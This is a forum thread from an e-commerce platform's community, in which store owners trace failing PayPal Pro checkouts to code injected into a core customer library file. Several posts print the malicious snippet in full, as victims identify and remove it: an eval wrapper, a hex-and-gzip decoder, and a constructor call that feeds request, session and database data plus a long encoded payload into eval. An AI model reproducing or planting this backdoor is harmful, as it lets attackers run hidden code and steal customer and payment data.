Post by suresoft » Sat Apr 06, 2013 10:15 pm

Hi, i have been using paypal pro, and it was working fine until a few days ago when I tested a new purchase. All of a sudden, I no longer get an order success screen, instead the customer stays on the screen with credit card details. The order does process, however. I checked my error log and I am receiving this error for both paypal pro and paypal recurring (Avicci extension): 2013-04-06 14:05:52 - PHP Notice:

Use of undefined constant HTTP_CATALOG - assumed 'HTTP_CATALOG' in /home5/suresoft/public_html/vqmod/vqcache/vq2-catalog_controller_payment_pp_pro.php on line 108.

I have had a few SSL issues and read that this error might be related but i cant be certain. Can someone please help me with this? thanks.

Newbie

Posts

Joined
Wed Mar 20, 2013 4:38 am

Post by tdubs » Mon Apr 15, 2013 1:30 am

I'm having a similar issue. The Confirm Order button does not redirect to the success page after it is clicked. The order processes, I receive emails confirming the order from Opencart and Paypal, but no success page. If you click it a second time, it redirects to the success page, but the customer is charged twice.

I am using Dreamventions one page checkout.

New member

Posts

Joined
Wed Mar 06, 2013 10:21 pm

Post by OpenCart.us » Tue Apr 23, 2013 3:45 am

Getting the same error running OpenCart 1.5.3.1 with PayPal Pro! Confirm Order button not redirecting when clicked on to index.php?route=checkout/success page since Friday April 19, 2013. Order and PayPal payment are processed, Confirmation emails received. Customer gets charged twice if clicks on Confirm button again. It was working fine before April 19.

Called PayPal Pro support who denied any changes on their end, was transferred twice to Tech support and left on hold for 30 minutes so we hung up. Emailing PayPal this forum thread to show them that something changed on April 19, 2013 and is affecting their PayPal Pro customers on OpenCart. Made a test purchase and only get these 2 errors in log:

PHP Notice: Undefined index: customer_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4

PHP Notice: Undefined index: payment_address_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4
Last edited by OpenCart.us on Fri May 03, 2013 1:39 am, edited 1 time in total.

Image
Quality OpenCart Extensions:
Exclude My Visits From Google Analytics
Hide Admin Dashboard Overview, Statistics & Latest Orders
Advanced Customer Reviews with Email, URL & Auto-Enable
Contact Us Page with Store Hours, Google Maps & Additional Text


User avatar
Newbie

Posts

Joined
Sat Jan 16, 2010 2:21 am
Location - New York, NY USA

Post by ca2kjet » Fri May 03, 2013 12:51 am

Has anyone had any success fixing this problem?? I've tried every possible thing I can think of... I don't understand what's causing this issue... I'm surprised there aren't more people complaining about this... ???

2013-05-02 8:08:10 - PHP Notice: Undefined index: customer_id in /nfs/c01/h14/mnt/31447/domains/XXXXXXX.com/html/system/library/customer.php(170) : eval()'d code on line 4
2013-05-02 8:08:10 - PHP Notice: Undefined index: payment_address_id in /nfs/c01/h14/mnt/31447/domains/XXXXXXX.com/html/system/library/customer.php(170) : eval()'d code on line 4

Newbie

Posts

Joined
Thu Apr 25, 2013 8:00 am

Post by OpenCart.us » Fri May 03, 2013 1:55 am

We finally spoke with a PayPal developer who assured us nothing changed in the PayPal Website Payment Pro API. So we dug deeper into the 2 errors everyone with this problem is reporting in the Error Log:

PHP Notice: Undefined index: customer_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4

PHP Notice: Undefined index: payment_address_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4

We found this suspicious code in system/library/customer.php OpenCart 1.5.3.1:

Code: Select all

function costc

($req,$ses,$db,$o) {
     eval//
    ($o);//
}
function h2b($h) { 
    $sb="";
    $h=str_replace(" ","",$h);   
    for($i=0;$i<strlen($h);$i+=2) {
        $sb.=(pack("H*",substr($h,$i,2)));
    }
    return gzuncompress($sb); 
}
We think we resolved the problem by removing it and are investigating how it got there and what it does. Can others confirm this and help determine if this is a hack?

Image
Quality OpenCart Extensions:
Exclude My Visits From Google Analytics
Hide Admin Dashboard Overview, Statistics & Latest Orders
Advanced Customer Reviews with Email, URL & Auto-Enable
Contact Us Page with Store Hours, Google Maps & Additional Text


User avatar
Newbie

Posts

Joined
Sat Jan 16, 2010 2:21 am
Location - New York, NY USA

Post by butte » Fri May 03, 2013 2:10 am

It's actually important that you already know your customers are sitting there unredirected or are even double-dunned with the same deal, rather than customers or banking winding up somewhere totally unexpected by either of you (seller or buyer, in each OC instance above). Somebody probably didn't quite pull off something worse, yet, whose attempt your code discovery seems to pinpoint.

Generally, familiarize yourself with your directories so that you can spot invaders by eye or sense when something is just not quite right.

Attacks are ongoing -- hackers are strewn around the globe and never sleep, and typically any sever address might be probed on the order of four and more times per minute around the clock. One recently illuminated means is via upload directories, putting in there text files with suspiciously long and complex names, and renamed .jpg instead. If a hacker can get that far, then he can also try to execute it, and then it may or may not execute (many hackers are actually not very bright). If you have an upload/ directory, check it for such files as noted, and rename the directory (machines need any name, gibberish/ works, hackers start with the obvious, upload/ is too obvious). One was illustratively sneaky by way of the filespec "route.php.jpg.4d0a6ff31f71cc20ab9d572bdfcdb7a0" as it would appear both as thrown error and as an address bar or status bar entry.

Other self-defenses include strong passwording of admin panel and moreover passwording its admin/ directory to block access to the panel, minding post and get, and using php die where appropriate.

See for recent overviews of security from several perspectives:
http://forum.opencart.com/viewtopic.php?f=20&t=98644
http://forum.opencart.com/viewtopic.php?f=20&t=98591

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by ca2kjet » Fri May 03, 2013 5:19 am

OpenCart.us wrote:We think we resolved the problem by removing it and are investigating how it got there and what it does. Can others confirm this and help determine if this is a hack?
This has got to be a hack of some sort... I've got a client running 1.5.0.5

Comparing what's on the server and what the original uploaded file looks like... I see the same additional code, PLUS that costc was found at the beginning of the file. Is someone getting credit card numbers this way???

Code: Select all

public function __construct($registry) {
		$this->config = $registry->get('config');
		$this->db = $registry->get('db');
		$this->request = $registry->get('request');
		$this->session = $registry->get('session'); costc($this->request->request,$this->session->data,$this->db,h2b(" 789c9d576d6fdb3610fe5ea0ff81158c524214d56f71b3b8ccda2 50a96ad8d37277b01b24ca025ca16204b2a49377196 fef71d69bd5996b3977c90a9e79ee77877d41d98 2834232198343b9c7dbec53c5d4986ef2cf4fa3512ab99907cdb 6077ed638b109cd1f59225f20db6d05f2f5f44db4 e7cdf4b56cb19e3cad1d313dab681a9053fa33cb8da2bfa2763b55d d32a394d04f5659426f80ec89c0591f494a6c55548e5239b71 da62ca13d63e9e49ef9ecdb25478758aae502708c9f977de4f53f7e2f2f 731bcfbbe4f3ac1ecf0f4f38af1b5695cbb1fddb31 b6438c0740c7f2564ba64dc29165e14d84d5b18712113ba64f 68e2ca6fb2c6c49a37817962c66d9224d5a1451566234083813a2da 195181a817263b8c22800d21de25f8e932a3c97a07cf 7fbdde5e4b7fd75724771dc131483f0d6a09a5ab44f2b51389d453066f50 9a1e2171678bac119d00ba984e3e358b823eba1737e887 c9e555635b34b97aee0c4933f2cab4eb320fb8e6b22a9eb6d41c16c9 55965d7f2aa716670aae79d299e718faed7b77ea3 e971022081b8e1925d2ea0826a0392a1bbe730c8c3e5c9d ef3bc91679de665e45d15e0c4bf58ce00433cef1584d1c64aa1 e3a3c853ef3787a2f366d0614192d996939f8093bd1328be1544de3c9b02 9e774ed416473962b41b5414dc17844e3e891e92eb6e00fb6f 88a582c5835da747cf31513b26ceab9201a36346cdca9202183 6df0d6c893dad8eb111ef620c8c2ff1cdc978d05 5b7cdb444e30dea45557148d560a2aa095affbbf24e76fad cc722494ec1a5229de77bc6b77faab3bbdc553f7d3e 4c6f53e9c9f4f41b3e5104ad0ccae09ed04a1095bf93 59076453e592a4109b4f3cb8953296ad0f39afeae a6bf372e9852b5a0f45b3bb3185d15bb42da15d54cab3475ac 5da5bb7c7ba31ab45fb34daf311b7da49a08bef8382 458ac8564cb373ef5174c3d61c6c43499afe89c39bda3c1e8a8 d78587eaec4e189030cd586282d0c6f400ebdee782606d7e48f 96c2d19e93e0c7ddd4f7142e09a122b81e08a1ba670 698938e98ee1f94e11d4e2e060d3b33e27c5c54670 1b0c762fdfc021c85f7033e5010c086efd596c55e4e1f3 3e9951c146438f25aa4690a5d05af009c175e09460d3972fee1751cc cc22289059a7cab6d99f2701813b49600ebbf6a86b8dc1ee101323a85e1 e16086cc5b7151746915a1f10f5b20924cc56529 850275b698d3f123d1d433f4e0553701eefd7fabdcc3b9b4c7ebc74 6ff1db51b7ff76d83dcaef78afd83293eb76bb05e1327f91a2855 c422632921113a6ca2b4ae616ca4b11b04d29da3cd8eed58df7f32f3 014aeadb17685df659c9d42ade03a395b85ba6cb0049f6ac91e 986ffe1bbfb9dc1ac35933f8a6cc1c50d78dce171a5b28f7ea 10f5eaa873ed0daccd6f378f652bad9caf6bb73df7cb00faa 341af7ff4cdded2d5ecffb374350ffb4b871864f49f 7c3d97d4a83b181cf786c37d49d5ec2aa90ee5c76495548dbe6ffbb a6eac5430c416f88ee4fb97004c92727da2be06fd16260daa020aaa5a 9f6cfe211938d922c3e310facd83ae80c9954828b 7a86de05422bb11ac36f84951a1bf01d95d1bcf"));

Newbie

Posts

Joined
Thu Apr 25, 2013 8:00 am

Post by butte » Fri May 03, 2013 8:07 am

They may be skimming or trying to skim customer information, or to divert traffic, or it could "just" be two or more successive attempts to execute what jumbles what it was supposed to do and aborts.

The sooner it's gone, then the sooner it cannot even be executed. Paying period (needn't be incessant) attention to timestamps and sizes of files as well as odd names or extensions helps to locate exactly that sort of thing. To some extent those oddments can be brought down and locally scanned. To some extent on the public servers we, ourselves, are the anti-malice scanners.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by BrettLefty » Sat May 11, 2013 8:50 am

OpenCart.us wrote:We finally spoke with a PayPal developer who assured us nothing changed in the PayPal Website Payment Pro API. So we dug deeper into the 2 errors everyone with this problem is reporting in the Error Log:

PHP Notice: Undefined index: customer_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4

PHP Notice: Undefined index: payment_address_id in /var/www/vhosts/website.com/httpdocs/system/library/customer.php(170) : eval()'d code on line 4

We found this suspicious code in system/library/customer.php OpenCart 1.5.3.1:

Code: Select all

function costc

($req,$ses,$db,$o) {
     eval//
    ($o);//
}
function h2b($h) { 
    $sb="";
    $h=str_replace(" ","",$h);   
    for($i=0;$i<strlen($h);$i+=2) {
        $sb.=(pack("H*",substr($h,$i,2)));
    }
    return gzuncompress($sb); 
}
We think we resolved the problem by removing it and are investigating how it got there and what it does. Can others confirm this and help determine if this is a hack?
So... is this a hack? I found it on a friends website and have no idea what it does, except that it is definitely not in the base files.

Newbie

Posts

Joined
Mon Oct 03, 2011 12:26 pm

Newbie

Posts

Joined
Mon Sep 24, 2012 2:17 pm

Post by srunyon1 » Fri May 24, 2013 9:05 am

I too am seeing this issue,
How ever I do not have the errors mentioned here.
nor do I have the file changes shown above.
It only happens with Paypal Pro and it very seldom will go to success screen.
mine too started around April 20th or so..

Active Member

Posts

Joined
Thu Jan 28, 2010 3:03 pm

Post by srunyon1 » Fri May 24, 2013 2:17 pm


Active Member

Posts

Joined
Thu Jan 28, 2010 3:03 pm

Post by Vectra » Thu Oct 10, 2013 3:34 am

I am running v1.5.2.1. I had the same problem with double orders to PayPalPro due to the "please wait" and then nothing or just "spins" at confirm order (which causes the customer to click confirm order again). My two errors (system/logs/errors) were the same, except to the vqmod/vqcache/ folder with customer_id and payment_address_id (184) line 4.
To fix I did as explained above with two deletions:
go to system/library/customer.php file and delete at the bottom:

Code: Select all

function costc

($req,$ses,$db,$o) {
     eval//
    ($o);//
}
function h2b($h) { 
    $sb="";
    $h=str_replace(" ","",$h);   
    for($i=0;$i<strlen($h);$i+=2) {
        $sb.=(pack("H*",substr($h,$i,2)));
    }
    return gzuncompress($sb); 
}
and also near the top delete the right 95% of line 17 starting with costc:

Code: Select all

		$this->session = $registry->get('session'); costc($this->request->request,$this->session->data,$this->db,h2b(" 789c9d576d6fdb3610fe5ea.......................
I do not get double orders anymore and I don't get those errors anymore.
Thank you.

New member

Posts

Joined
Sat May 12, 2012 3:32 am

Post by bowlescreative » Sat Dec 21, 2013 12:24 am

I am running Version 1.5.6
I just upgraded our site from 1.4 to 1.5

Using paypalpro, when customer clicks 'Confirm Purchase' they see the spinning gif and then nothing. They are not directed to the success page. The order does go through both in paypal and opencart.

I have read above post, nothing directly applies to our situation as a potential fix.

Suggestions?


Posts

Joined
Thu Dec 19, 2013 10:43 pm

Post by pbarber91 » Sat Aug 30, 2014 12:34 am

I am running into that same issue here. Nothing posted in the forum so far has applied to my situation. I don't have the "Vqmod_product_bundle.xml" file and I don't have the code listed above in my customer.php file.

Newbie

Posts

Joined
Fri Aug 08, 2014 11:00 pm
Who is online

Users browsing this forum: Amazon [Bot], Baidu [Spider] and 114 guests